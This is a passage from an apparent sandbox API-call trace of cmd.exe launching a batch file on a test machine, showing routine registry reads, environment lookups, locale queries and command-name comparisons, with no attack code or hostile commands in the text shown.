lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce734 | out: phkResult=0x2ce734*=0x68) returned 0x0 [0133.046] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x0, lpData=0x2ce740*=0x0, lpcbData=0x2ce738*=0x1000) returned 0x2 [0133.046] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x4, lpData=0x2ce740*=0x1, lpcbData=0x2ce738*=0x4) returned 0x0 [0133.046] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x0, lpData=0x2ce740*=0x1, lpcbData=0x2ce738*=0x1000) returned 0x2 [0133.046] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x4, lpData=0x2ce740*=0x0, lpcbData=0x2ce738*=0x4) returned 0x0 [0133.046] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x4, lpData=0x2ce740*=0x40, lpcbData=0x2ce738*=0x4) returned 0x0 [0133.046] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x4, lpData=0x2ce740*=0x40, lpcbData=0x2ce738*=0x4) returned 0x0 [0133.046] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x0, lpData=0x2ce740*=0x40, lpcbData=0x2ce738*=0x1000) returned 0x2 [0133.046] RegCloseKey (hKey=0x68) returned 0x0 [0133.047] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce734 | out: phkResult=0x2ce734*=0x68) returned 0x0 [0133.047] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x0, lpData=0x2ce740*=0x40, lpcbData=0x2ce738*=0x1000) returned 0x2 [0133.047] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x4, lpData=0x2ce740*=0x1, lpcbData=0x2ce738*=0x4) returned 0x0 [0133.047] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x0, lpData=0x2ce740*=0x1, lpcbData=0x2ce738*=0x1000) returned 0x2 [0133.047] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x4, lpData=0x2ce740*=0x0, lpcbData=0x2ce738*=0x4) returned 0x0 [0133.047] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x4, lpData=0x2ce740*=0x9, lpcbData=0x2ce738*=0x4) returned 0x0 [0133.047] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x4, lpData=0x2ce740*=0x9, lpcbData=0x2ce738*=0x4) returned 0x0 [0133.047] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x0, lpData=0x2ce740*=0x9, lpcbData=0x2ce738*=0x1000) returned 0x2 [0133.047] RegCloseKey (hKey=0x68) returned 0x0 [0133.047] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2b0 [0133.047] srand (_Seed=0x5f51e2b0) [0133.047] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\MSBuild\\executed_florists.exe\"\"" [0133.047] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\MSBuild\\executed_florists.exe\"\"" [0133.048] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0133.048] GetProcessHeap () returned 0x2f0000 [0133.048] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x210) returned 0x3020e8 [0133.048] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3020f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0133.048] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0133.048] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.048] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0133.048] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0133.049] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0133.049] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0133.049] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0133.049] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0133.049] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0133.049] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0133.049] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0133.049] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0133.049] GetProcessHeap () returned 0x2f0000 [0133.049] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x302bc0 | out: hHeap=0x2f0000) returned 1 [0133.049] GetEnvironmentStringsW () returned 0x302300* [0133.049] GetProcessHeap () returned 0x2f0000 [0133.049] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xae2) returned 0x304c60 [0133.049] FreeEnvironmentStringsW (penv=0x302300) returned 1 [0133.049] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.049] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0133.049] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0133.049] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0133.050] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0133.050] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0133.050] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0133.050] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0133.050] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0133.050] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0133.050] GetProcessHeap () returned 0x2f0000 [0133.050] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x54) returned 0x3017b8 [0133.050] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf500 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0133.050] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf500, lpFilePart=0x2cf4fc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2cf4fc*="Desktop") returned 0x25 [0133.050] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0133.051] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf27c | out: lpFindFileData=0x2cf27c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x305750 [0133.051] FindClose (in: hFindFile=0x305750 | out: hFindFile=0x305750) returned 1 [0133.051] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2cf27c | out: lpFindFileData=0x2cf27c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x305750 [0133.051] FindClose (in: hFindFile=0x305750 | out: hFindFile=0x305750) returned 1 [0133.051] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0133.051] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2cf27c | out: lpFindFileData=0x2cf27c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x305750 [0133.051] FindClose (in: hFindFile=0x305750 | out: hFindFile=0x305750) returned 1 [0133.051] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0133.051] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0133.051] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0133.051] GetProcessHeap () returned 0x2f0000 [0133.052] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304c60 | out: hHeap=0x2f0000) returned 1 [0133.052] GetEnvironmentStringsW () returned 0x304170* [0133.052] GetProcessHeap () returned 0x2f0000 [0133.052] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb36) returned 0x305f90 [0133.052] FreeEnvironmentStringsW (penv=0x304170) returned 1 [0133.052] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0133.052] GetProcessHeap () returned 0x2f0000 [0133.052] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3017b8 | out: hHeap=0x2f0000) returned 1 [0133.052] GetProcessHeap () returned 0x2f0000 [0133.052] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x400e) returned 0x306ad0 [0133.053] GetProcessHeap () returned 0x2f0000 [0133.053] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xdc) returned 0x302e40 [0133.053] GetProcessHeap () returned 0x2f0000 [0133.053] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x4008) returned 0x30aae8 [0133.053] GetProcessHeap () returned 0x2f0000 [0133.053] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x4008) returned 0x30eaf8 [0133.054] GetProcessHeap () returned 0x2f0000 [0133.054] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306ad0 | out: hHeap=0x2f0000) returned 1 [0133.054] GetConsoleOutputCP () returned 0x1b5 [0135.614] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0135.614] GetUserDefaultLCID () returned 0x409 [0135.617] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0135.617] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf640, cchData=128 | out: lpLCData="0") returned 2 [0135.617] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf640, cchData=128 | out: lpLCData="0") returned 2 [0135.617] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf640, cchData=128 | out: lpLCData="1") returned 2 [0135.617] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0135.617] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0135.618] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0135.618] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0135.618] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0135.618] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0135.618] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0135.618] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0135.618] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0135.618] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0135.618] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0135.620] GetProcessHeap () returned 0x2f0000 [0135.621] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x20c) returned 0x302f28 [0135.621] GetConsoleTitleW (in: lpConsoleTitle=0x302f28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.621] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0135.622] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0135.622] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0135.622] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0135.623] GetProcessHeap () returned 0x2f0000 [0135.623] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x400a) returned 0x306ad0 [0135.623] GetProcessHeap () returned 0x2f0000 [0135.623] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306ad0 | out: hHeap=0x2f0000) returned 1 [0135.626] _wcsicmp (_String1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"", _String2=")") returned -7 [0135.626] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0135.626] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0135.626] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0135.626] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0135.626] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0135.626] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0135.626] GetProcessHeap () returned 0x2f0000 [0135.626] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x58) returned 0x303140 [0135.626] GetProcessHeap () returned 0x2f0000 [0135.626] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x72) returned 0x312b20 [0135.628] GetProcessHeap () returned 0x2f0000 [0135.628] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x6c) returned 0x3031a0 [0135.630] GetConsoleTitleW (in: lpConsoleTitle=0x2cf338, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.630] GetFileAttributesW (lpFileName="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\\"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat\"")) returned 0xffffffff [0135.632] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0135.632] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0135.632] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0135.632] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0135.632] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0135.632] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0135.632] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0135.632] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0135.632] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0135.632] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0135.632] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0135.632] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0135.632] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0135.632] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0135.633] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0135.633] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0135.633] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0135.633] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0135.633] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0135.633] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0135.633] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0135.633] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0135.633] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0135.633] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0135.633] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0135.633] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0135.633] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0135.633] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0135.633] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0135.633] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0135.633] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0135.633] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0135.633] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0135.633] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0135.633] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0135.634] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0135.634] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0135.634] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0135.634] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0135.634] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0135.634] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0135.634] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0135.634] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0135.634] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0135.634] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0135.634] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0135.634] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0135.634] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0135.634] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0135.634] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0135.634] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0135.634] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0135.634] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0135.634] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0135.635] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0135.635] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0135.635] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0135.635] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0135.635] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0135.635] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0135.635] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0135.635] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0135.635] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0135.635] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0135.635] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0135.635] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0135.635] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0135.635] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0135.635] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0135.635] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0135.636] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0135.636] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0135.636] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0135.636] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0135.636] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0135.636] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0135.636] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0135.636] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0135.636] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0135.636] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0135.636] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0135.636] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0135.636] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0135.637] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0135.637] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0135.637] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0135.637] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0135.637] GetProcessHeap () returned 0x2f0000 [0135.637] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x210) returned 0x303218 [0135.637] GetProcessHeap () returned 0x2f0000 [0135.637] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xd6) returned 0x303430 [0135.639] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0135.640] GetProcessHeap () returned 0x2f0000 [0135.640] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x418) returned 0x2f07f0 [0135.640] SetErrorMode (uMode=0x0) returned 0x0 [0135.640] SetErrorMode (uMode=0x1) returned 0x0 [0135.641] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x2f07f8, lpFilePart=0x2cee58 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2cee58*="Desktop") returned 0x25 [0135.641] SetErrorMode (uMode=0x0) returned 0x1 [0135.641] GetProcessHeap () returned 0x2f0000 [0135.641] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x2f07f0, Size=0x6e) returned 0x2f07f0 [0135.641] GetProcessHeap () returned 0x2f0000 [0135.641] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f07f0) returned 0x6e [0135.641] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 1 [0135.641] GetProcessHeap () returned 0x2f0000 [0135.642] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x5a) returned 0x303510 [0135.642] GetProcessHeap () returned 0x2f0000 [0135.642] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xa8) returned 0x303578 [0135.642] GetProcessHeap () returned 0x2f0000 [0135.642] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x303578, Size=0x5a) returned 0x303578 [0135.642] GetProcessHeap () returned 0x2f0000 [0135.642] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x303578) returned 0x5a [0135.642] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0135.642] GetProcessHeap () returned 0x2f0000 [0135.642] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xe0) returned 0x2f0868 [0135.653] GetProcessHeap () returned 0x2f0000 [0135.653] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x2f0868, Size=0x76) returned 0x2f0868 [0135.653] GetProcessHeap () returned 0x2f0000 [0135.653] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f0868) returned 0x76 [0135.653] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.654] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", fInfoLevelId=0x1, lpFindFileData=0x2cebf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cebf4) returned 0x3035e0 [0135.654] GetProcessHeap () returned 0x2f0000 [0135.654] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x14) returned 0x3017f0 [0135.655] FindClose (in: hFindFile=0x3035e0 | out: hFindFile=0x3035e0) returned 1 [0135.655] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0135.655] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0135.655] GetConsoleTitleW (in: 